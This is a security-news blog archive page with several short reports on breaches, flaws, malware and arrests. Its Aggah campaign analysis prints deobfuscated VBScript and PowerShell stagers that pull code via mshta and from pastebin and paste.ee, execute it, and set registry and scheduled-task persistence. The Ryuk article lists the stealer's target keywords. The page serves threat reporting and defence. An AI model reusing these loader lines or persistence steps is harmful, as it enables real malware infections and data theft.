Category Archives: Hacking News

Zoom Bug Could Have Let Uninvited People Join Private Meetings

If you use Zoom to host your remote online meetings, you need to read this piece carefully. The massively popular video conferencing software has patched a security loophole that could have allowed anyone to remotely eavesdrop on unprotected active meetings, potentially exposing private audio, video, and documents shared throughout the session. Besides hosting password-protected virtual

Aggah: How to run a botnet without renting a Server (for more than a year)

Experts from Yoroi-Cybaze ZLab have spotted new attack attempts directed to some Italian companies operating in the Retail sector linked to Aggah campaign.

Introduction

During the last year, we constantly kept track of the Aggah campaigns. We started deepening inside the Roma225 Campaign and went on with the RG Campaign, contributing to the joint effort to track the offensive activities of this threat actor.

Recently, during our Cyber Defence monitoring operations, we spotted other attack attempts directed to some Italian companies operating in the Retail sector. For this reason, the  Cybaze-Yoroi ZLab team decided to dissect this last Aggah campaign and track its latest variations.

Technical Analysis

Hash77bbd615bc5b34ce007a82a7f365426fc1091ed7eeca3b3888d35b8242288184
ThreatYakka3 Campaign
Brief DescriptionMalicious ppa file dropper with macro
Ssdeep1536:LEFGlBGHLAegbRrnDKSeJ8SuXCak5w/PYvwgqTtCxqTyU2wCNkY:LplBKLAegbRrnDKSeJ8SuXXk5ALgqd2

Table 1. Sample information

The initial file is a Microsoft PowerPoint PPA file. It actually is an Add-in file designed to add new behavior to the classic PowerPoint presentations, in this case to add a nasty macro:

Figure 1: Piece of the malicious macro

The malicious code within the PPA abuses the Microsoft mshta utility to download a web page from the BlogSpot platform.

Figure 2: Result of the Bit.ly link

The HTML page closely matches the modus operandi of the previous Aggah threat. In this case, the blogspot post is named “20sydney new” but it uses the same trick from the past: hiding the javascript stager code inside the web page, an ad hoc code snippet which will be interpreted and executed only by the mshta engine.

Figure 3: Malicious code hidden in the Blogspot web page and executed by the MSHTA engine

The parameter passed the “unescape()” function results in another two layers of encoded strings, adopting a sort of “matrioska unecape obfuscation”. After these layers, we recovered the malicious logic of the stager:

  1. <script language=”VBScript”>
  2. Set M_c = CreateObject(StrReverse(“llehS.tpircSW”))
  3. Dim L_c
  4. L_c = StrReverse(“exe.drowniw mi/ f/ llikksat & exe.lecxe mi/ f/ llikksat c/ dmc”)
  5. M_c.Run L_c, vbHide
  6. set Ixsi = CreateObject(StrReverse(“llehS.tpircSW”))
  7. Dim Bik
  8. Bik1 = “mshta http:\\pastebin.com\raw\JELH48mw”
  9. Ixsi.run Bik1, vbHide
  10. set nci = CreateObject(StrReverse(“llehS.tpircSW”))
  11. Dim xx
  12. xx1 = “r “”mshta http:\\pastebin.com\raw\JELH48mw”” /F “
  13. xx0 = StrReverse(“t/ )+niam+( nt/ 06 om/ ETUNIM cs/ etaerc/ sksathcs”)
  14. nci.run xx0 + xx1, vbHide
  15. Set ll = CreateObject(StrReverse(“llehS.tpircSW”))
  16. no = StrReverse(“mmetsaP\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”)
  17. ll.RegWrite no,”mshta http:\\pastebin.com\raw\NxJCPTmQ”,”REG_SZ”
  18. self.close
  19. </script>

Code Snippet 1

The first part of this initial implant aims to kill the Word and Excel processes. Immediately after that, the malware downloads other code through leveraging mshta once again, this time from a pastebin snippet.

Figure 4: Piece of the malicious Pastebin

The author of this pastes is no more “HAGGA”, as seen in our previous analysis, now the he moved to another one: “YAKKA3”:

Figure 5: Evidence of YAKKA3 Pastebin user

The paste was created on the 25th November 2019 and it has likely been edited many times in the course the last month. In the past Aggah was frequently changing the content of his pastes to modify the malware behaviour and drop many kinds of malware. On some occasions, some of them suspected to be related to the Gorgon APT group. Anyway, during the analysis, the content of the encoded string is the following:

  1. <script language=”VBScript”>
  2. Set MVn = CreateObject(StrReverse(“llehS.tpircSW”))
  3. Mcn = “powershell do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName(‘Microsoft.VisualBasic’);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’Dow$_$loadStri$_$g’.replace(‘$_$’,’n’),[Microsoft.VisualBasic.CallType]::Method,’https://paste.ee/r/Zhs3s’)|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’Dow$_$loadStri$_$g’.replace(‘$_$’,’n’),[Microsoft.VisualBasic.CallType]::Method,’https://paste.ee/r/Fk9yH’).replace(‘*’,’0x’)|IEX;[vroombrooomkrooom]::kekedoyouloveme(‘calc.exe’,$f)”
  4. MVn.Run Mcn, vbHide
  5. self.close
  6. </script>

Code Snippet 2

The above script is a piece of VBS script designed to run some other Powershell loader. The powershell script tests the internet connectivity by pinging to google.com and then starts the infection. The script downloads two other pastes. The first is a PE file and the second one is a custom .NET process injection utility.

The Injector

Hashb8f6cad3723d1dd2219d02f930e5cda776c124387f19f3decd867495ce614eb7
ThreatYakka3 Campaign
Brief DescriptionInjector through process hollowing
Ssdeep384:0UUX1vfjRPJok0e9i3h3i91/EPK59732wag7lRa3oNU1XURDlK67qfM9Wi:0X1qH3hBPU3B7K4NUJCDCfM

Table 2. Sample information of the injector 

The injector component is invoked through its static method “[vroombrooomkrooom]::kekedoyouloveme(‘calc.exe’,$f)”, as seen in the code snippet 2. The only purpose of this component is to inject a payload inside the memory of another one process, as indicated in the parameter.

Figure 6: Write Process Memory technique

The injection technique is very basic. In fact the injection uses the textbook  “CreateRemoteThread” technique, well documented and used actively implemented by many actors and malware developers. 

Figure 7: Injected payload inside calc.exe process

UAC Bypass Tool

In Code Snippet 1 we saw that the aggah implant persists on the target machine by setting the “mshta http:[\\pastebin.]com\raw\NxJCPTmQ” command into the Registry Key “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Pastemm”, so, it potentially loads different payloads on every run.

Figure 8: Piece of the malicious script executed by the persistence mechanism

Unlike previous pastes, the author of this one is YAKKA4. Probably, a form of redundancy in case of take down of the other accounts. 

Figure 9: YAKKA4 evidence

Anyway, the code served by this paste downloads another binary file from an additional Paste site: paste.ee.

  1. <script language=”VBScript”>
  2. Set i9i9 = CreateObject(“W” + “S” + “c” + “r” + “i” + “p” + “t” + “.” + “S” + “h” + “e” + “l” + “l”)
  3. i9i9.Run(“P” + “o” + “w” + “e” + “r” + “s” + “h” + “e” + “l” + “l” + “.” + “e” + “x” + “e -noexit [Byte[]]$sc64= iex(iex(‘(&” + “(GCM *W-O*)’+ ‘Net.’+” + “‘WebC’+’l” + “ient)’+’.Do” + “w’+’nload’+’Str’+’ing(”https://p” + “aste.ee/r/6EdQX”).repl” + “ace(”*^*”,”^%$”).r” + “e” + “p” + “l” + “a” + “c” + “e” + “(”^%$”,”0x”)’));[<##>” + “Ap” + “pDomain<##>]::<##>(‘(” + “&$@#$%^&*(urrent” + “Domain’.rep” + “lace(‘(&$@#$%^&*(‘,’C’))<##>.<##>(‘%” + “*&^*&^*&^*&^*&oad’.r” + “eplace(‘%” + “*&^*&^*&^” + “*&^*&” + “‘,’L’))(” + “$sc64).’EntryP” + “oint'<##>.<##>(‘in*&^*” + “&^*&^&*^*&^o” + “k))*()*)(**(&(*&’.r” + “e” + “p” + “l” + “a” + “c” + “e” + “(‘))*()*)(**” + “(&(*&’,’e’).r” + “e” + “p” + “l” + “a” + “c” + “e” + “(‘*&^” + “*&^*&^&*^*&^’,’v’))($null,$null)”),0
  4. self.close
  5. </script>

Code Snippet 3

This last binary actually is a hacking tool implementing the CMSTP Bypass technique, a technique used to bypass Windows UAC prompts. 

According to the Microsoft Documentation, “Connection Manager is a suite of components that provides administrators with the ability to create and distribute customized remote access connections and to create, distribute, and automatically update customized phone books.”.

However, the cyber attackers could exploit an infected INF file to execute arbitrary commands bypassing the UAC, elevating privileges in a stealthy way. In this case the CMSTP Bypass technique implemented into a .NET executable. 

  Figure 10: Synthesis of the CMSTP Bypass technique

The Payload

As we saw in the past, Aggah used to change its payloads during time, and this time we observed that the delivered malware was not RevengeRAT. It rather was a LokiBot variant. This info stealer is well-known in the community since 2016 and it was deeply analyzed in the course of the years. 

In this case, it has the following configuration:

Figure 11: Loki Bot configuration with communication to the C2

The December Payloads

As anticipated before, Aggah payloads are quite dynamic. According to the some observation of community researches such as @DrStache, the Aggah pastebin accounts were dropping AZOrult infostealer few days before the Lokibot observation. 

Investigating the c2 infrastructure through the Azorult-Tracker services, we noticed the AZOrult malware distributed by Aggah in that period was targeting a modest number of victims mainly located in the United States, United Arab Emirates and also Pakistan, Germany and Israel. 

Conclusions

The Aggah actor keeps threatening organizations all around the world. During the time it built a custom stager implant based on legit third parties services, such as Pastebin and BlogSpot, abused by the actor to manage the infected hosts and to run its botnet without renting a server. 

During the last year we contributed to the joint effort to track its activities, along with PaloAlto’s Unit42, and after a year we can confirm it is still active and dangerous. At the moment it is not clear if this actor is just selling its hacking services or running its own campaigns, or both.

In conclusion, there is no hard evidence confirming or denying its potential relationships with the Gorgon APT, and factors like the different nationalities and the small amount of victims connected to December Aggah activities, does not help to exclude it.

Further technical details, including Indicators of Compromise (IoCs) and Yara rules, are reported in the analysis published by Yoroy-Cybaze Z-Lab:

Pierluigi Paganini

(SecurityAffairs – Aggah, botnet)

The post Aggah: How to run a botnet without renting a Server (for more than a year) appeared first on Security Affairs.

Operation Night Fury: Group-IB helps take down a cybergang behind the infection of hundreds of websites all over the world

More details emerged from the recently disclosed Operation Night Fury: Group-IB helps take down a cybergang behind the infection of hundreds of e-commerce.

Operators of the JavaScript-sniffer family, dubbed «GetBilling» by Group-IB, were arrested in Indonesia. The arrest came as a result of a joint operation «Night Fury» initiated by INTERPOL’s ASEAN Cyber Capability Desk (ASEAN Desk) that involved Indonesian Cyber Police (BARESKRIM POLRI (Dittipidsiber)) and Group-IB’s APAC Cyber Investigations Team.

The operation is still ongoing in five ASEAN countries with which the intelligence was also shared. This case marks the first successful multi-jurisdictional operation against the operators of JavaScript-sniffers in the region. According to Group-IB’s data, the suspects have managed to infect hundreds of websites in various locations, including in Indonesia, Australia, the United Kingdom, the United States, Germany, Brazil, and some other countries. Payment and personal data of thousands of online shoppers from Asia, Europe, and the Americas have been stolen.

The three suspects with the initials «ANF» (27 y.o.), «K» (35 y.o.), and «N» (23 y.o.) were arrested in December 2019 in two different regions in Indonesia — Special Region of Yogyakarta and Special Capital Region of Jakarta — as part of the joint operation «Night Fury» carried out by Indonesian Cyber Police and INTERPOL with the help of Group-IB’s Cyber Investigations team. During the special operation, Indonesian Cyber Police seized laptops, mobile phones of various brands, CPU units, IDs, BCA Token, ATM cards. The suspected operators of the GetBilling JavaScript-sniffer family are charged with the theft of electronic data, which carries up to a 10-year jail sentence in accordance with Indonesian criminal code.

“Strong and effective partnerships between police and the cybersecurity industry are essential to ensure law enforcement worldwide has access to the information they need to address the scale and complexity of today’s cyberthreat landscape. This successful operation is just one example of how law enforcement are working with industry partners, adapting and applying new technologies to aid investigations and ultimately reduce the global impact of cybercrime,» concluded Mr Jones.”

Craig Jones

Craig Jones

INTERPOL’s Director of Cybercrime

“There are many challenges and obstacles in cross-border hi-tech crime investigations like this. The Night Fury Operation showed that these obstacles could only be overcome with close collaboration between national law enforcement, international organizations and private companies. Effective multi-jurisdictional coordination of efforts between Indonesia’s Cyber Police, INTERPOL and Group-IB allowed to attribute the crimes, establish the perpetrators behind the JS-sniffer and arrest them. But more importantly to protect the community and raise public awareness about the problem of cybercrime and its impact.”

Idam Wasiadi

Idam Wasiadi

Police Superintendent, Cybercrime Investigator at Directorate of Cybercrime of CID of Indonesian National Police

“With cybercrime being a growing threat across the region, the ASEAN Desk was launched by INTERPOL to assist law enforcement agencies enhance their proactive response against cybercrime. Through this operation, it is clear that timely intelligence sharing and coordinated actions are the ways forward to effectively combat cybercrime regionally and globally.”

James Tan

James Tan

INTERPOL Acting Assistant Diector (Strategy & Capabilities Development)

JavaScript-sniffers (JS-sniffers) targeting ecommerce websites is a type of malicious JavaScript code, designed to steal customer payment and personal data such as credit card numbers, names, addresses, logins, phone numbers, and credentials from payment systems, and etc.

Group-IB has been tracking the GetBilling JS-sniffer family since 2018. The analysis of infrastructure that was controlled by the suspected operators of GetBilling arrested in Indonesia, carried out by Group-IB’s Cyber Investigations team, revealed that they have managed to infect nearly 200 websites in Indonesia, Australia, Europe, the United States, South America, and some other countries. However, the investigation in other ASEAN countries continues, and the number of websites infected with GetBilling family is likely to be higher. According to the investigation, stolen payment data was used by the suspects to buy goods, such as electronic devices or other luxury items, which they tried to resell online in Indonesia at below the market price.

Fig. 1 Example of GetBilling’s malicious script

Fig. 2 Example of stolen payment and personal data stored on GetBilling’s servers

Group-IB Cyber Investigations team determined that some of the GetBilling’s infrastructure was located in Indonesia. Upon discovery of this information, INTERPOL’s ASEAN Desk promptly notified Indonesian cyber police. Further investigation discovered that the GetBilling’s operators were not new to the world of cybercrime. To access their servers for stolen data collection and their JS-sniffers’ control, they always used VPN to hide their real location and identity. To pay for hosting services and buy new domains the gang members only used stolen cards. Despite that, Indonesian cyber police in cooperation with INTERPOL and Group-IB’s Cyber Investigations team managed to establish that the group was operating from Indonesia.

“This case showed the nature of cybercrime — the operators of the JS-sniffer lived in one country attacking websites all around the world. It makes evidence collection, identification of suspects, and prosecution more complicated. Another thing that the case demonstrated vividly is that international cooperation and cyber intelligence data exchange can help effectively tackle modern cyber threats. Thanks to Indonesian Cyber Police and INTERPOL’s prompt actions, Night Fury became the first successful multi-jurisdictional operation against the operators of JavaScript-sniffers in the APAC region. It is a great example of coordinated cross-border anti-cybercrime effort, and we are proud that our threat intelligence and digital forensics expertise helped to establish the suspects. We hope this will set a precedent for law enforcement in  jurisdiction too.”

James Tan

Vesta Matveeva

Head of Group-IB’s APAC Cyber Investigations Team

By leveraging its own infrastructure for monitoring of underground forums and cardshops, Group-IB has collected comprehensive information about the carding market and is capable of identifying various anomalies. According to Group-IB’s annual 2019 threat report, the number of compromised cards uploaded to underground forums increased from 27.1 million to 43.8 million in H2 2108-H1 2019 year-on-year. The size of the carding market, in turn, grew by 33 percent and amounted to USD 879.7 million. The sale of CVV data is also on rise today, having increased by 19 percent in the corresponding period, and one of the key reasons behind this trend could be JavaScript-sniffers.

GetBilling family was first described in Group-IB’s 2019 report «Crime without punishment» which is a deep dive into the world of JS‑sniffers. According to the author of the report Viktor Okorokov, threat intelligence analyst at Group-IB, at the time of the report’s publication, in total Group-IB Threat Intelligence team discovered 38 families of JS-sniffers. Ever since, the number of JS-sniffer families, discovered by the company, has almost doubled and continues to grow. JS‑sniffers have caused many security incidents in past — the infection of the British Airways website and mobile app, payment-card attack on the UK website of the international company FILA etc. — and continue to gain popularity among cybercriminals. Most recently, in December 2019, JS-sniffers hit the APAC infecting the websites of Singaporean fashion brand «Love, Bonito.

To avoid big financial losses due to JS-sniffers, it’s recommended for online users to have a separate pre-paid card for online payments, set spending limits on cards, used for online shopping, or even use a separate bank account exclusively for online purchases. Online merchants, in their turn, need to keep their software updated and carry out regular cybersecurity assessments of their websites.

Press release is available here.

About the author Group-IB:

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. Group-IB is a partner of INTERPOL, Europol, and has been recommended by the OSCE as a cybersecurity solutions provider. Group-IB is a member of the World Economic Forum.   

Pierluigi Paganini

(SecurityAffairs – Operation Night Fury, hacking)

The post Operation Night Fury: Group-IB helps take down a cybergang behind the infection of hundreds of websites all over the world appeared first on Security Affairs.

Mozilla banned hundreds of malicious Firefox add-ons over the last weeks

Mozilla is intensifying the efforts to protect its users, in the last couple of weeks, the security staff has banned 200 malicious Firefox add-ons.

Over the past two weeks, Mozilla has reviewed and banned 197 Firefox add-ons because they were executing malicious code. The malicious Firefox add-ons were found stealing user data and for this reason, they were removed from the Mozilla Add-on (AMO) portal.

Mozilla also disabled the malicious add-ons in the browsers of the users who have already installed them.

The apps were using obfuscation to hide their source code and were downloading and executing code from a remote server, a behavior that violates the policy of the portal. Downloading code from a remote server could allow threat actors to execute malicious code within the browser once it will be dynamically downloaded from a server under their control.

Mozilla banned 14 Firefox add-ons ([1], [2]. [3]) because they were using obfuscated code and potentially hiding malicious code.

Most of the banned apps have been developed by 2Ring, a provider of B2B software.

Mozilla banned for the same reason six Firefox add-ons developed by Tamo Junto Caixa, and three add-ons that were fake premium products.

Mozilla also banned an unnamed add-onWeatherPool and Your SocialPdfviewer – toolsRoliTrade, and Rolimons Plus for collecting user data without consent.

The organization also banned for malicious behavior other 30 add-ons.

Firefox also reported the case of an add-on named Fake Youtube Downloader was spotted attempting to install a malware in users’ browsers.

Mozilla also banned Firefox Add-ons like EasySearch for Firefox, EasyZipTab, ConvertToPDF, and FlixTab Search were for intercepting and collecting user search terms, a behavior that violates the rules.

Pierluigi Paganini

(SecurityAffairs – Mozilla, Firefox)

The post Mozilla banned hundreds of malicious Firefox add-ons over the last weeks appeared first on Security Affairs.

A new piece of Ryuk Stealer targets government, military and finance sectors

A new piece of the Ryuk malware has been improved to steal confidential files related to the military, government, financial statements, and banking.

Security experts from MalwareHunterTeam have discovered a new version of the Ryuk Stealer malware that has been enhanced to allow its operators to steal a greater amount of confidential files related to the military, government, financial statements, and banking.

In September 2019, BleepingComputer reported the discovery of a new piece of malware that included references to the Ryuk Ransomware and that was used to steal files with filenames matching certain keywords.

It is not clear if the malware was developed by the threat actors behind Ryuk Ransomware for data exfiltration.

“It is likely the same actor with the access to the earlier Ryuk version who repurposed the code portion for this stealer,” explained the popular malware researcher Vitali Kremez.

“What we do know is that the malware is targeting very specific keywords that could be disastrous for governments, military operations, and law enforcement cases if the stolen files are exposed.” reported BleepingComputer.

The new variant of the Ryuk Stealer malware implements a new file content scanning feature and is able to search for additional keywords in the filenames for data exfiltration.

Source BleepingComputer

The variant of the Ryuk Stealer recently discovered is able to look for C++ code files (i.e. .cpp), further Word and Excel document types, PDFs, JPG image files, and also files associated with cryptocurrency wallets.

The scanning module first checks if the files on the systems have one of the above extensions, then it will check the contents of the files to verify the presence of one of the following keywords.

'personal', 'securityN-CSR10-SBEDGAR', 'spy', 'radar', 'agent', 'newswire', 'marketwired', '10-Q', 'fraud', 'hack', 'defence', 'treason', 'censored', 'bribery', 'contraband', 'operation', 'attack', 'military', 'tank', 'convict', 'scheme', 'tactical', 'Engeneering', 'explosive', 'drug', 'traitor', 'suspect', 'cyber', 'document', 'embeddedspy', 'radio', 'submarine', 'restricted', 'secret', 'balance', 'statement', 'checking', 'saving', 'routing', 'finance', 'agreement', 'SWIFT', 'IBAN', 'license', 'Compilation', 'report', 'secret', 'confident', 'hidden', 'clandestine', 'illegal', 'compromate', 'privacy', 'private', 'contract', 'concealed', 'backdoorundercover', 'clandestine', 'investigation', 'federal', 'bureau', 'government', 'security', 'unclassified', seed', 'personal', 'confident', 'mail', 'letter', 'passport', 'victim', 'court', 'NATO', 'Nato', 'scans', 'Emma', 'Liam', 'Olivia', 'Noah', 'William', 'Isabella', 'James', 'Sophia', 'Logan', 'Clearance'

In addition, the stealer will also check the presence of one of other 55 keywords in the filenames.

Once the document has passed the checks, it will be uploaded to an FTP site, experts pointed out that the code of the Ryuk stealer includes two FTP sites. At the time of the analysis, both sites were not reachable at the time of the analysis.

Targeted keywords in the new variant of the Ryuk stealer confirm that attackers are looking for confidential information in military, banking, finance and law enforcement.

Another aspect to consider is that operators behind ransomware are also interested in stealing sensitive data from their victims and use them to blackmail victims and force them to pay the ransom like the Maze ransomware gang does.

Pierluigi Paganini

(SecurityAffairs – Ryuk stealer, hacking)

The post A new piece of Ryuk Stealer targets government, military and finance sectors appeared first on Security Affairs.

City of Potsdam offline following a cyberattack

The City of Potsdam suffered a major cyberattack that took down its servers earlier this week, but emergency services were not impacted.

The German City of Potsdam has suffered a major cyberattack that took down its servers earlier this week, the good news is that emergency services, including the city’s fire department fully operational and payments were not affected.

Potsdam is the capital and largest city of the German federal state of Brandenburg. It directly borders the German capital, Berlin, and is part of the Berlin/Brandenburg Metropolitan Region

The intrusion into the Potsdam administration’s servers was discovered on Tuesday, and on Wednesday evening systems were disconnected from the Internet to contain the infection and prevent data exfiltration.

“The state capital Potsdam has switched off the administration’s internet connection and is therefore no longer accessible by email.” reads the advisory published by the City of Potsdam.

“We put our systems offline for security reasons, because we have to assume an illegal cyber attack,” said Mayor Mike Schubert. “We are working flat out to ensure that the affected administration systems are switched on again as soon as possible and that we can work safely again. In the meantime, we ask for your patience in all matters relating to the citizen service facilities, ” “We put our systems offline for security reasons, because we have to assume an illegal cyberattack,”

The IT staff noticed “numerous inconsistencies” in central access to the capital of the state. Experts noticed a system of an external provider that was attempting to retrieve data from the state capital from outside without authorization or to install malware. 

The City of Potsdam hired external IT security companies and IT forensic experts to investigate the attack.

The state capital has filed criminal charges against unknown individuals and notified the incident to the regional offices responsible for IT security and data protection.

The City published an update that announced that Postdam’s administration is not able to receive emails from outside and any incoming emails won’t be forwarded either.

Citizens could contact the City by calling the Potsdam administration staff on the phone or submitting their applications in writing by post.

“After switching off the Internet connection of the state capital Potsdam, the citizen service of the state capital Potsdam is currently only of limited use.” reads the update. “The administration can currently not receive emails from outside and incoming emails are also not forwarded. For this reason, it is necessary for citizens to submit all applications in writing to the administration by post. The employees are still available by phone for questions. “

The City of Potsdam did not provide details on the attack, but German journalist Hanno Böck reported that Citrix ADC servers on the administration’s network are affected by the CVE-2019-19781 vulnerability.

Citrix started addressing CVE-2019-19781 vulnerability in Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances.

Pierluigi Paganini

(SecurityAffairs – Potsdam, hacking)

The post City of Potsdam offline following a cyberattack appeared first on Security Affairs.

Security Affairs newsletter Round 248

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Bot list with Telnet credentials for more than 500,000 servers and IoT devices leaked online
Hackers patch Citrix servers to deploy their own backdoor
Citrix releases permanent fixes for CVE-2019-19781 flaw in ADC 11.1 and 12.0
JhoneRAT uses Google Drive, Twitter, ImgBB, and Google Forms to target countries in Middle East
Mitsubishi Electric discloses data breach, media blame China-linked APT
NATO will send a counter-hybrid team to Montenegro to face Russias threat
WP Database Reset WordPress plugin flaws allow website takeover
Expert found a hardcoded SSH Key in Fortinet SIEM appliances
NIST releases version 1.0 of the Privacy Framework
The Mystery of Fbot
US-based childrens clothing maker Hanna Andersson discloses a data breach
Yomi Hunter Catches the CurveBall
Jeff Bezos phone was hacked by Saudi crown prince
Malware attack took down 600 computers at Volusia County Public Library
OP Glowing Symphony – How US military claims to have disrupted ISIS ‘s propaganda
250 Million Microsoft customer support records and PII exposed online
Iran-Linked PupyRAT backdoor used in recent attacks on European energy sector
THSuite data leak exposes cannabis users information
Cisco fixes critical issue in Cisco Firepower Management Center
Expert released DOS Exploit PoC for Critical Windows RDP Gateway flaws
NK CARROTBALL dropper used in attacks on U.S. Govn Agency
Russian operator of Cardplanet carding site pleads guilty in the US
Chinese hackers exploited a Trend Micro antivirus zero-day used in Mitsubishi Electric hack
Cisco Webex flaw allows unauthenticated remote attackers to join private meetings
For the second time in a few days, Greek Government websites hit by DDoS attacks

Pierluigi Paganini

(SecurityAffairs – Newsletter, hacking)

The post Security Affairs newsletter Round 248 appeared first on Security Affairs.

Cisco Webex flaw allows unauthenticated remote attackers to join private meetings

Cisco addressed a vulnerability in Cisco Webex that could be exploited by a remote, unauthenticated attacker to join a protected video conference meeting.

Cisco has addressed a high-severity flaw in the Cisco Webex video conferencing platform (CVE-2020-3142) that could be exploited by a remote, unauthenticated attacker to enter a password-protected video conference meeting.

In order to exploit the CVE-2020-3142 flaw, the attacker only needs to know the meeting ID that once inserted in the Webex mobile application for either iOS or Android will allow him to join the meeting bypassing any authentication.

“A vulnerability in Cisco Webex Meetings Suite sites and Webex Meetings Online sites could allow an unauthenticated, remote attendee to join a password-protected meeting without providing the meeting password. The connection attempt must initiate from a Webex mobile application for either iOS or Android.” reads the security advisory published by Cisco. “An unauthorized attendee could exploit this vulnerability by accessing a known meeting ID or meeting URL from the mobile device’s web browser.”

The CVE-2020-3142 vulnerability has received a CVSS score of 7.5 out of 10, it was discovered while its experts were resolving a Cisco TAC support case.

Fortunately, the presence of the attackers in the meeting is easy to detect because the unauthorized attendees would be visible in the attendee list of the meeting as a mobile attendee. 

The vulnerability affects Cisco Webex Meetings Suite sites and Cisco Meetings Online sites for versions earlier than 39.11.5 (for the former) and 40.1.3 (for the latter).  

Cisco addressed the CVE-2020-3142 vulnerability with the release of the versions 39.11.5 and later and 40.1.3 and later for Webex Meetings Suite sites and Webex Meetings Online sites.

The good news is that the Cisco Product Security Incident Response Team (PSIRT) is not aware of any attack exploiting the vulnerability in the wild.

A couple of weeks ago, Cisco Systems released security fixes for two high-severity vulnerabilities in its products, including a remote code execution flaw in the Webex video conferencing platform.

The Webex flaw addressed by Cisco resides in the web-based management interface of Webex Video Mesh, a feature that enables on-premises infrastructure for video conferencing.

This flaw affects Webex Video Mesh Software releases earlier than 2019.09.19.1956m.

Pierluigi Paganini

(SecurityAffairs – Webex, hacking)

The post Cisco Webex flaw allows unauthenticated remote attackers to join private meetings appeared first on Security Affairs.

Russian operator of Cardplanet carding site pleads guilty in the US

A Russian national pleaded guilty this week to running a carding website called Cardplanet that helped people commit credit-card fraud.

Last year, the Russian man Aleksei Burkov (29) was accused of running an online criminal marketplace, called Cardplanet, that helped crooks to organize more than $20 million in credit card fraud. In November, the suspect has been extradited to the US to face criminal charges.

Burkov was also operating another invite-only cybercrime forum, to obtain membership prospective members needed three existing members to “vouch” for their good reputation in the cybercrime community. The membership also requested a sum of money, normally $5,000, as insurance. Cardplanet was offering for sale stolen credit-card numbers for a price ranging from $3 to $60.

The suspect was arrested in Israel in 2015, his case made the headlines multiple times because media speculated a possible prisoner swap with Naama Issachar, an Israeli-American that was arrested in Russia on cannabis charges. In October, the Israel justice minister approved the extradition of Alexei Burkov to the United States.

Burkov entered the plea to charges including fraud and money laundering in a federal court in Alexandria.

“A Russian national pleaded guilty today to charges related to his operation of two websites devoted to the facilitation of payment card fraud, computer hacking and other crimes.” reads the press release published by the Department of Justice. “Aleksei Burkov, 29, pleaded guilty before Senior U.S. District Judge T.S. Ellis III to access device fraud and conspiracy to commit computer intrusion, identity theft, wire and access device fraud and money laundering.  Sentencing is scheduled for May 8, 2020.”

In court, Burkov admitted to running a second website on an invite-only basis that was also for sale stolen payment data.

Sentencing is scheduled for May 8, 2020, Burkov faces a prison sentence of up to 15 years.

Pierluigi Paganini

(SecurityAffairs – Burkov, hacking)

The post Russian operator of Cardplanet carding site pleads guilty in the US appeared first on Security Affairs.

Cisco fixes critical issue in Cisco Firepower Management Center

Cisco addressed a critical issue in the Cisco Firepower Management Center (FMC) that could allow a remote attacker to bypass authentication and execute arbitrary actions.

Cisco fixed a critical vulnerability in the Cisco Firepower Management Center that could allow a remote attacker to gain administrative access to the web-based management interface of the vulnerable devices and execute arbitrary actions. The vulnerability tracked as CVE-2019-16028 received a CVSS score of 9.8. 

“A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.” reads the security advisory published by Cisco.

“The vulnerability is due to improper handling of Lightweight Directory Access Protocol (LDAP) authentication responses from an external authentication server. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to gain administrative access to the web-based management interface of the affected device.”

The issue, Cisco stems from the improper handling of Lightweight Directory Access Protocol (LDAP) authentication responses from an external server. The issue could be triggered by sending crafted HTTP requests to a vulnerable device and gain administrative access to the web-based management interface.

Cisco warns that only Cisco Firepower Management Center configured to authenticate users of the web-based management interface through an external LDAP server are affected. 

“To determine whether external authentication using an LDAP server is configured on the device, administrators can navigate to System > Users > External Authentication and look for an External Authentication Object that uses LDAP as the authentication method. The External Authentication Object must be enabled for the FMC to be affected.” continues the advisory.

Cisco released FMC Software versions 6.4.0.7 and 6.5.0.2 to address the flaw, it also announced the release of patches for versions 6.2.3 (6.2.3.16) and 6.3.0 (6.3.0.6) in February and May 2020, respectively. 

The company confirmed that there are no workarounds that address this vulnerability, it also confirmed that this issue does not affect Cisco Adaptive Security Appliance (ASA) Software or Cisco Firepower Threat Defense (FTD) Software.

Cisco is not aware of any attack in the wild exploiting the flaw.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Cisco fixes critical issue in Cisco Firepower Management Center appeared first on Security Affairs.

250 Million Microsoft customer support records and PII exposed online

An expert discovered that over 250 million Microsoft customer support records might have been exposed along with some personally identifiable information.

The popular researcher Bob Diachenko found an unprotected database containing over 250 million customer support records along with some personally identifiable information. The unprotected archive was containing support requests submitted to the tech giant from 2005 to December 2019.

Diachenko reported his discovery to the company that after investigating the issue admitted the data leak.

“Today, we concluded an investigation into a misconfiguration of an internal customer support database used for Microsoft support case analytics.” reads the post published by Microsoft. “While the investigation found no malicious use, and although most customers did not have personally identifiable information exposed, we want to be transparent about this incident with all customers and reassure them that we are taking it very seriously and holding ourselves accountable.”

Microsoft confirmed that Customer Service and Support” (CSS) records were exposed online due to a misconfigured server containing logs of conversations between the support team and its customers.

Microsoft secured the database on December 31, 2019, it also added that it is not aware of malicious use of the data.

Microsoft explained that the database was redacted using automated tools to remove the personally identifiable information of its customers, but in some sporadic cases, this information was not removed because there was not a standard format.

Diachenko confirmed the presence of many records containing the following attributes:

  • Customer email addresses
  • IP addresses
  • Locations
  • Descriptions of CSS claims and cases
  • Microsoft support agent emails
  • Case numbers, resolutions, and remarks
  • Internal notes marked as “confidential”

The availability of detailed logs in the hand of crooks could expose Microsoft customers to the risk of Tech support scams

“Even though most personally identifiable information was redacted from the records, the dangers of this exposure should not be underestimated. The data could be valuable to tech support scammers, in particular.” explained Diachenko.

